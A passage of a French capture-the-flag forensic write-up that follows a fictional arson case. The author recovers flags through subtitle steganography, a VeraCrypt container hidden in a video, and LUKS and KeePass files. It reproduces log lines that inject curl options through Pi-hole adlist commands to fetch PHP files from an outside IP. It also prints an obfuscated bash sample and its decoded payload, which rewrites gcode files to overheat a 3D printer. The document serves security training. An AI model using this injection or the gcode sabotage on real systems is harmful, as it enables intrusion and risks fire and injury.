Kd7 Kf1 1106. Kc7 Ke1 1107. Kb8 Kf2 1108. Ka8 Kg1 1109. Kb7 Kf1 1110. Kb8 Ke1 1111. Ka7 Kd1 1112. Kb8 Kd2 1113. Kc7 Kc3 1114. Kb6 Kd3 1115. Ka6 Kc3 1116. Ka7 Kd2 1117. Kb8 Kc3 1118. Ka8 Kb2 1119. Ka7 Ka1 1120. Kb7 Kb1 1121. Ka6 Ka2 1122. Kb6 Kb2 1123. Ka7 Kc2 1124. Kb6 Kb3 1125. Ka6 Ka3 1126. Ka5 Kb3 1127. Ka6 Kc4 1128. Ka5 Kc5 1129. Ka4 Kd5 1130. Ka5 Kc4 1131. Ka4 Kd5 1132. Ka3 Kd6 { White resigns. } 0-1

Je décide d'effectuer quelques recherches sur ce format.

Je tombe sur le dépot github d'un certain "jes" https://github.com/jes/chess-steg qui a développé un outil pour encoder/décoder du texte au format pgn.

Il met en plus à disposition un outil en ligne : https://incoherency.co.uk/chess-steg/

Et cette fois ci, la piste de recherche prend tout son sens :

On découvre une conversation entre "Drewski" et "Yuri".

Drewski semble vouloir acheter quelques choses à Yuri à travers des cryptomonnaies, Drewski procède à un paiement, et Yuri lui envoie un fichier "stl". Mais quelque chose se passe mal... car Yuri veut dans ses derniers messages, tuer Drewski. Drewski serait-il le maker mort dans l'incendie ?

En attendant, j'ai mon 2ème flag : ECW{6d064b364f2a315c32fd25184256c1278b12ee73} + 50 points

Lord of War 3/4

Piste de recherche : 2eme flag.txt

Pour cette 3ème étape, nous recherchons un deuxième fichier flag.txt sur l'image disque de la clé usb.

Ce fichier est peut-être caché dans les 2 fichiers pdf restant, où dans les 2 vidéos.

Je remarque un détail important concernant les deux vidéos, elles font la même durée, mais la vidéo VOST à une taille pratiquement deux fois plus grandes que l'autre.

onosh@siftworkstation:# ls -l |grep 'mp4'
-rwxrwxrwx 1 onosh onosh   7858017 Oct 15 23:09 MrNigloR-S01-ep1.mp4
-rwxrwxrwx 1 onosh onosh  18215861 Oct 17 12:18 MrNigloR-S01-ep1-VOST.mp4

On pourrait penser que les sous-titres sont la cause de cette différence de taille... je décide de les analyser !

onosh@siftworkstation:# du -h *mp4
7.5M    MrNigloR-S01-ep1.mp4
18M MrNigloR-S01-ep1-VOST.mp4

La vidéo est l'épisode 1 de la saison 1 de la série Mister Robot.

Un détail m'interpelle, certaines lettres dans les sous titres sont écrites en italiques :

J'extrait les sous-titres de la vidéo avec l'outil ffmpeg :

onosh@siftworkstation:# cat MrNigloR-S01-ep1-VOST_3_text.srt 
1
00:00:00,700 --> 00:00:03,700
What is it about society
that d<i>i</i>sappoints you so much?

2
00:00:11,000 --> 00:00:12,600
Oh, I <i>d</i>on't know.

3
00:00:13,200 --> 00:00:16,080
Is it that we collectively
thought Steve J<i>o</i>bs

4
00:00:16,080 --> 00:00:18,000
Was a great man, even whe<i>n</i> we knew

5
00:00:18,000 --> 00:00:21,000
He made billions off <i>t</i>he backs of children?

6
00:00:23,000 --> 00:00:26,500
Or maybe it's that it feels l<i>i</i>ke
all our heroes are counterfeit.

7
00:00:27,300 --> 00:00:30,000
The world itself's just one bi<i>g</i> hoax.

8
00:00:31,000 --> 00:00:34,300
Spamming with our run<i>n</i>ing
commentary of bullshit

9
00:00:34,300 --> 00:00:39,100
masquerading as insight, <i>o</i>ur
social media faking as intimacy.

10
00:00:41,000 --> 00:00:43,500
Or is it that we voted fo<i>r</i> this?

11
00:00:43,550 --> 00:00:43,550
scC<=:7b:?rCJAE$Ac4b

12
00:00:44,000 --> 00:00:46,000
Not with our rigged
<i>e</i>lections, but with our things,

13
00:00:46,000 --> 00:00:47,700
our propert<i>y</i>, our money.

14
00:00:48,510 --> 00:00:51,100
I'm n<i>o</i>t saying anything new.
We all know why we do this,

15
00:00:51,100 --> 00:00:53,200
not because H<i>u</i>nger Games
books makes us happy

16
00:00:54,100 --> 00:00:55,800
but because we wanna <i>b</i>e sedated.

17
00:00:56,000 --> 00:00:58,600
Because it's painful n<i>o</i>t to pretend,

18
00:00:58,600 --> 00:01:00,000
<i>b</i>ecause we're cowards.

19
00:01:01,090 --> 00:01:03,100
Fuck societ<i>y.</i>

On retrouve les caractères en italiques encadré par les balises <i></i>. En les récupérant un à un, on obtient idontignoreyouboby.

onosh@siftworkstation:# cat MrNigloR-S01-ep1-VOST_3_text.srt |grep '<i>' |cut -d">" -f2 |cut -d"<" -f1 |tr -d '\n'
idontignoreyouboby.

Autre détail, je remarque dans les sous-titres la chaîne scC<=:7b:?rCJAE$Ac4b mais elle semble être chiffré.

L'un des PDF (Wiki.pdf) disponible sur la clé usb, on nous donne des informations sur le ROT13, une technique de chiffrement par décalage :

Vu l'alphabet utilisé pour cette chaîne chiffré, le ROT13 n'est pas adapté. En revanche le ROT47 oui, car il prend en charge les caractères spéciaux, j'obtiens une clé : D4rklif3inCryptSp4c3

Maintenant, j'ai deux clés potentiels, mais je ne sais pas quoi en faire !

Après quelques recherches par mots clés sur google, je trouve mon bonheur, un article de Korben qui semble intéressant :

Cacher un conteneur TrueCrypt dans une vidéo

Que dit l'article :

Martin Fiedler, un allemand portant le pseudo KeyJ a mis en ligne sur son blog, une méthode permettant d’intégrer dans une vidéo MP4, un conteneur TrueCrypt... Avant de commencer, il faut trouver un MP4 ou un MOV qui soit crédible pour le transport. C’est à dire un film qui soit suffisamment bien encodé et de bonne qualité, pour qu’une augmentation de sa taille n’éveille pas les soupçons. Une série de 500 Mo que vous ferez grimper à 700 Mo pourra faire l’affaire si la qualité est au rendez-vous.

Comment cela fonctionne ?

Plus de détails

Et si nous avions un container chiffré dans notre vidéo ? Cela expliquerai sa taille importante et l'existance des clés pour le déchiffrer !

onosh@siftworkstation -> /tmp 
# mkdir /mnt/veracrypt
onosh@siftworkstation -> /tmp 
# veracrypt -t MrNigloR-S01-ep1-VOST.mp4 /mnt/veracrypt/
Enter password for /tmp/MrNigloR-S01-ep1-VOST.mp4: 
Enter PIM for /tmp/MrNigloR-S01-ep1-VOST.mp4: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]: 

onosh@siftworkstation -> /tmp 
# ls -l /mnt/veracrypt/
total 5502
-rwx------ 1 root root 4106658 oct.  23  2019 Brandalism.pdf
-rwx------ 1 root root      46 juil.  2 08:55 Flag.txt
-rwx------ 1 root root 1521110 juil.  2 09:29 Liberator.gcode
-rwx------ 1 root root    3150 juil.  2 08:43 xbdk.kdbx

3ème mission réussie ! le flag est à nous : ECW{40474cc4ffb7874ebab39da9d1a16caaa9f06b07} + 100 points

Lord of War 4/4

Pour ce dernier challenge, il n'y a pas de piste de recherche.

Le container veracrypt contenait 3 autres fichiers :

Un fichier pdf
Un fichier gcode
Un fichier kdbx

onosh@siftworkstation -> /tmp 
# ls -l /mnt/veracrypt/
total 5502
-rwx------ 1 root root 4106658 oct.  23  2019 Brandalism.pdf
-rwx------ 1 root root      46 juil.  2 08:55 Flag.txt
-rwx------ 1 root root 1521110 juil.  2 09:29 Liberator.gcode
-rwx------ 1 root root    3150 juil.  2 08:43 xbdk.kdbx

Le fichier Brandalism.pdf n'est pas intéressant car il est identique à celui mis à disposition par l'entreprise Brandalism sur internet (sha256sum identique).

Le fichier Liberator.gcode semble intéressant, car le "gcode" est un langage pour donner des instructions à une imprimante 3D. Mais ce fichier ne cache aucun secret, à part le logo des organisateurs du CTF.

Le dernier fichier est un keepass, j'essaye de l'ouvrir avec la clé récupéré précédemment idontignoreyouboby :

Et ça marche, le flag de cette dernière étape de la première partie était caché ici !

ECW{9dc2896d55b56eb19f59d544383f832644381817} + 100 points

Partie II

Cette deuxième partie est constituée de 3 étapes et l'analyse se concentre sur l'image disque du rapsberry, c'est à dire le fichier Raw2.dd

Burn After Reading 1/3

On nous donne les informations suivantes :

Suite de l'enquête sur le maker décédé dans des conditions suspicieuses...

Une piste de recherche : Point d'entrée

Ici, on doit chercher une trace, qui montrerait le point d'entrée de l'attaquant. Et pour trouver une trace, on vise automatiquement les logs.

Malheuresement, cette image disque du raspberry est chiffré avec Luks ! mais heureusement, le maker a enregistré la clé de déchiffrement dans le fichier keepass :

Il suffit de monter la partition chiffrée avec la clé "3DPiting" :

onosh@siftworkstation -> /tmp 
# cryptsetup luksOpen lapartitionluks.dd BRIOCHE
Enter passphrase for lapartitionluks.dd: 
onosh@siftworkstation -> /tmp 
# mount -r /dev/mapper/BRIOCHE /mnt/lulu/
onosh@siftworkstation -> /tmp 
# ls -l /mnt/lulu/
total 88
drwxr-xr-x  2 root root  4096 mai   27 07:11 bin
drwxr-xr-x  2 root root  4096 mai   27 07:24 boot
drwxr-xr-x  4 root root  4096 mai   27 07:05 dev
drwxr-xr-x 87 root root  4096 juil.  9 12:20 etc
drwxr-xr-x  3 root root  4096 mai   27 07:10 home
drwxr-xr-x 17 root root  4096 juil.  9 10:00 lib
drwx------  2 root root 16384 mai   27 07:24 lost+found
drwxr-xr-x  2 root root  4096 mai   27 07:05 media
drwxr-xr-x  2 root root  4096 mai   27 07:05 mnt
drwxr-xr-x  4 root root  4096 juil.  9 09:42 opt
drwxr-xr-x  2 root root  4096 mai   10 20:59 proc
drwx------  3 root root  4096 janv.  1  1970 root
drwxr-xr-x  4 root root  4096 mai   27 07:05 run
drwxr-xr-x  2 root root  4096 juil.  9 10:00 sbin
drwxr-xr-x  2 root root  4096 mai   27 07:05 srv
drwxr-xr-x  2 root root  4096 mai   10 20:59 sys
drwxrwxrwt  7 root root  4096 juil.  9 16:54 tmp
drwxr-xr-x 10 root root  4096 mai   27 07:05 usr
drwxr-xr-x 12 root root  4096 juil.  9 09:34 var

On a désormais accès au raspberry.

Comme dit ci-dessus, nous recherchons une "trace", quoi de mieux que les logs pour trouver cela ?

onosh@siftworkstation -> /m/lulu/ 
# ls -lart var/log/
total 18580
-rw-r--r--  1 root     root            0 mai   27 07:24 bootstrap.log
drwx------  2 root     root         4096 mai   27 07:24 private
-rw-r-----  1 root     adm        211062 juil.  9 09:21 syslog.1
-rw-rw----  1 root     utmp          384 juil.  9 09:23 btmp
drwxr-xr-x 12 root     root         4096 juil.  9 09:34 ..
-rw-r--r--  1 root     root         1380 juil.  9 09:41 alternatives.log
-rw-r--r--  1 root     root        24000 juil.  9 09:41 faillog
drwxr-x---  2 www-data www-data     4096 juil.  9 09:42 lighttpd
drwxr-xr-x  2 vboxadd       995     4096 juil.  9 09:43 pihole
drwxr-xr-x  6 root     root         4096 juil.  9 09:43 .
drwxr-xr-x  2 root     root         4096 juil.  9 10:48 apt
-rw-r--r--  1 root     root        55060 juil.  9 10:52 dpkg.log
-rw-r-----  1 root     adm          2600 juil.  9 12:18 user.log
-rw-r-----  1 root     adm         16883 juil.  9 12:18 debug
-rw-r-----  1 root     adm        136403 juil.  9 13:22 messages
-rw-rw-r--  1 root     utmp       292292 juil.  9 16:53 lastlog
-rw-r-----  1 root     adm        143132 juil.  9 16:53 kern.log
-rw-r-----  1 root     adm         96431 juil.  9 16:53 auth.log
-rw-r--r--  1 vboxadd       995 17953851 juil.  9 16:53 pihole.log
-rw-r-----  1 root     adm        115833 juil.  9 16:53 syslog
-rw-r-----  1 root     adm        168331 juil.  9 16:53 daemon.log
-rw-r--r--  1 vboxadd       995    15747 juil.  9 16:53 pihole-FTL.log
-rw-rw-r--  1 root     utmp        16128 juil.  9 16:54 wtmp

Nous savons que le maker est mort dans un incendie, suite à l'attaque d'un pirate. Nous devons retrouver le point d'entrée du pirate... le fichier auth.log semble être l'un des plus pertinent pour lister les tentatives d'authentification.

Je découvre des traces qui semblent malveillante vers 13:50:59 :

Jul  9 10:42:22 raspberrypi usermod[11586]: add 'pihole' to group 'www-data'
Jul  9 10:42:22 raspberrypi usermod[11586]: add 'pihole' to shadow group 'www-data'
Jul  9 10:42:22 raspberrypi usermod[11592]: add 'www-data' to group 'pihole'
Jul  9 10:42:23 raspberrypi usermod[11592]: add 'www-data' to shadow group 'pihole'
Jul  9 13:50:59 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts
Jul  9 13:50:59 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable https://mirror1.malwaredomains.com/files/justdomains
Jul  9 13:51:00 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable http://sysctl.org/cameleon/hosts
Jul  9 13:51:00 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt
Jul  9 13:51:01 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt
Jul  9 13:51:01 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable https://hosts-file.net/ad_servers.txt
Jul  9 13:51:02 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist add http://RUNXe2VkOTM3NWYzMGJkMjIwNzdjZmRkNDk3YWU3YzJhZWYxYmI0YjgzMmZ9Cg==
Jul  9 13:51:04 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable http://RUNXe2VkOTM3NWYzMGJkMjIwNzdjZmRkNDk3YWU3YzJhZWYxYmI0YjgzMmZ9Cg==
Jul  9 13:51:04 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist add http://2.57.116.54# -o fun.php -d 
Jul  9 13:51:06 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin/scripts/pi-hole/php ; USER=root ; COMMAND=/usr/local/bin/pihole -g
Jul  9 13:51:30 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin/scripts/pi-hole/php ; USER=root ; COMMAND=/usr/local/bin/pihole -g
Jul  9 13:51:53 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist disable http://2.57.116.54# -o fun.php -d
Jul  9 13:51:53 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin ; USER=root ; COMMAND=/usr/local/bin/pihole -a adlist add http://2.57.116.54# -o teleporter.php -d 
Jul  9 13:51:55 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin/scripts/pi-hole/php ; USER=root ; COMMAND=/usr/local/bin/pihole -g
Jul  9 13:52:17 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin/scripts/pi-hole/php ; USER=root ; COMMAND=/usr/local/bin/pihole -g
Jul  9 13:52:38 raspberrypi sudo: www-data : TTY=unknown ; PWD=/var/www/html/admin/scripts/pi-hole/php ; USER=root ; COMMAND=/usr/local/bin/pihole -a -t

L'utilisateur de "pihole", un outil pour bloquer les publicités, à supprimer et ajouter des noms de domaines aux listes de blocage de pihole.

Un nom de domaine est particulier : http://RUNXe2VkOTM3NWYzMGJkMjIwNzdjZmRkNDk3YWU3YzJhZWYxYmI0YjgzMmZ9Cg==

Il s'agit d'une chaine encodé en base64, et si on l'a décode :

onosh@siftworkstation -> /m/lulu/ 
# echo "RUNXe2VkOTM3NWYzMGJkMjIwNzdjZmRkNDk3YWU3YzJhZWYxYmI0YjgzMmZ9Cg==" |base64 -d
ECW{ed9375f30bd22077cfdd497ae7c2aef1bb4b832f}

Nous avons notre flag : ECW{ed9375f30bd22077cfdd497ae7c2aef1bb4b832f} + 50 points

Burn After Reading 2/3

Piste de recherche : Fichiers Ciblés

Rappelons nous, Yuri, le pirate avait envoyé un fichier "STL", ce fichier est utilisé par les imprimantes 3D. Je décide d'analyser les fichiers que l'imprimante du maker à utilisé.

La solution "octoprint" est installé sur le raspberry, cette solution permet de contrôler les opérations d'une imprimante 3D.

Les fichiers imprimés par l'imprimante sont stockés dans le répertoire uploads/

onosh@siftworkstation -> /m/lulu/ 
# ls -lart home/pi/.octoprint/uploads/
total 62316
-rw-------  1 bsi bsi  1310133 juil.  9 13:03 CE3PRO_Table_Hanger.gcode
-rw-------  1 bsi bsi  1561146 juil.  9 13:03 Liberator.gcode
-rw-------  1 bsi bsi 41533989 juil.  9 13:03 CE3PRO_corona.gcode
-rw-------  1 bsi bsi  3434681 juil.  9 13:03 CE3PRO_unbelievable.gcode
-rw-------  1 bsi bsi  1099516 juil.  9 13:03 CE3PRO_MIG-29_kit.gcode
-rw-------  1 bsi bsi 14846427 juil.  9 13:04 CE3PRO_Naomi__Wu.gcode

On découvre 6 fichiers, ouvrons les tous !

CE3PRO_Table_Hanger.gcode

CE3PRO_corona.gcode

CE3PRO_MIG-29_kit.gcode

CE3PRO_Naomi__Wu.gcode

CE3PRO_unbelievable.gcode

Cool, on a notre flag ! ECW{f79d8842c644881ddf017e0928e87710c0a15d84} + 50 points

Burn After Reading 3/3

Piste de recherche : Le virus

Pour cette dernière et ultime étape, nous devons retrouver le virus qui a tué le maker (non ce n'est pas le corona virus)

On imagine qu'il y a une action sur l'imprimante pour que celle-ci prennent feu, et tue Drewski...

Le meilleur moyen de retrouver ce "virus", est de tracer une timeline des événement, le dernier jour ou le raspberry a fonctionné.

Actuellement, le seul élement malveillant que nous avons, est le nom de domaine louche, ajouté par le pirate à travers pihole.

La photo en plus grand

L'ensemble de l'attaque est maintenant tracée, un élément est particulièrement étrange... il s'agit du script basic-install.sh.

C'est le premier élément louche à être présent sur le raspberry, d'une part par son horaire de création sur le serveur et d'autre part par son contenu.

Voici un échantillon de ce qu'il contient :

#!/bin/bash
  ${*^^}   "${@}"ba"${@%4GJp}"s'h'   ${*%%x\{&|q\]l} "${@/\(mL\'U./>l\"rs}" <<< "$(    "${@//F\[sym/8%wS;k43}"  $'\x70'rin''t'f' "\x$(  ${@,} \p\ri""\nt''$'\u0066'  %s  ';6Jb+l<2' "${@##=#BHH}" ${*~} |  "${@//x$Rdu;gr/VQos\!yS}" ${*,,}   'm'$'\1445''s'$'\u0075'm "${@~}"  |  $* ${*}   $'\x63'"${@#T%EP#}"u${*^}t   -b  $[   ((-56"#"k+-"6"1"#""$@"e)+22#2"7") ]-$[ ((15#"0"+-3#"${@/07Ueg+,@/d\!Fm%}"1"${@/t9u&17#/h\)V#wqQf}"1)+5${*^^}3"${@//Md=.RU</2=*P8o%v}"#${@%%ecrN}m)   ]   ${*##nN2Wv} ${*,,}   )"  ${@,}   ;   ${*//z\}BWp+:}   ${*//oxQaU2}  pr\in\t''f   "\x$( ${*//?I2jQpv}   $'\160\x72'""${*~}i$'\x6e'"t""f" %s  'dy52hd]8' ${*^} ${@#$&2\)-=*#} |   ${*,,}  m''d5''$'\u0073'um "${@^}" | "${@/a0^SL,,}" ${*~} cut -b $((  ((${!*}-53#a+4#"${@/1Cg\!JLUk}"11)+57#k)   ))-$[ ((-6"#

Le script bash semble avoir été obfusqué avec Bashfuscator, malheuresement pour nous, il n'existe pas de désobfuscateur…

Après avoir sandboxer ce petit script, qui peut-être contient un virus, je l'éxécute pour voir ce qu'il me donne. Quelques secondes d'attente, et le code source d'une page web s'affiche, la page youtube d'un clip de Kenji Girac...

Cela ne nous avance pas beaucoup...

Analysons la structure du fichier :

Il contient énormément d'expression étrange comme ${@//\{twl}
Au début du fichier, nous avons une redirection (<<<) :
- ${*^^} "${@}"ba"${@%4GJp}"s'h' ${*%%x\{&|q\]l} "${@/\(mL\`U./>l\"rs}" <<< "$( "${@//F\[sym/8%wS;k43}"

Ce fameux "<<<" permet en bash, d'afficher ou d'éxécuter une commande en input.

Que ce passe t'il si je remplace ${*^^} "${@}"ba"${@%4GJp}"s'h' ${*%%x\{&|q\]l} "${@/\(mL\`U./>l\"rs}" par un simple cat pour afficher la commande lancée...

onosh@a154po4d2:/tmp# ./basic-install.sh
curl 'https://www.youtube.com/watch?v=63K5VMx2BZM' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Cookie: VISITOR_INFO1_LIVE=fiPetRZgDXQ; YSC=JleF1aORUEc; GPS=1; CONSENT=WP.288b95' -H 'Upgrade-Insecure-Requests: 1' -H 'TE: Trailers'

La commande curl qui récupère la page youtube du clip de Kenji s'affiche, cool !

Le fichier cache peut être une aute occurence de cette fameuse redirection "<<<"

Je trouve une deuxième redirection identique ! Le fichier utilise un OU pour lancer deux commandes :

bash <<< printf $(...) || bash <<< printf $(...)

Je n'ai plus qu’à récupérer la deuxième commande... Même opération que toute à l'heure, j'ajoute cat devant le deuxième "<<<" :

#ECW{7aaceb8d3e60402d94079707d2430c7394d916eb}
files=$(find / -type f -name "*.gcode" 2>/dev/null)
files=$(echo $files | tr " " "\n")
for file in $files
do
    sz=$(wc -l $file)
    sz=$(echo $sz |  cut -d " " -f1)
    div="2"
    med=$(expr $sz / $div)
    cat $file |head -n $med > temp
    python -c 'print "M107\nM190 S105\nM190 S105\nM109 S250"'>>temp
    x=$(cat $file |head -n $med | tail -n 1 | cut -d 'X' -f2 | cut -d '.' -f1)
    ((x2=$x+1))
    python -c 'print("G1 E10 F100\nG1 X'$x'\nG1 E10 F100\nG1 X'$x2'\n")*1000' >> temp
    cat $file |tail -n $med >> temp
    cat temp > $file
    rm temp
done